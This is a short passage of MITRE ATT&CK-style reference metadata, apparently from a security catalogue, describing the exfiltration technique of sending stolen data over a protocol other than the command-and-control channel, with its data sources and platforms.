Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre